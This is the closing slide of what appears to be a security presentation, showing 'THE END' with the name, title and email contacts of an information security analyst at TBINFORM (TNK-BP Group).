  • 67. THE END Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group) vbkropotov@tnk-bp.com kropotov@ieee.org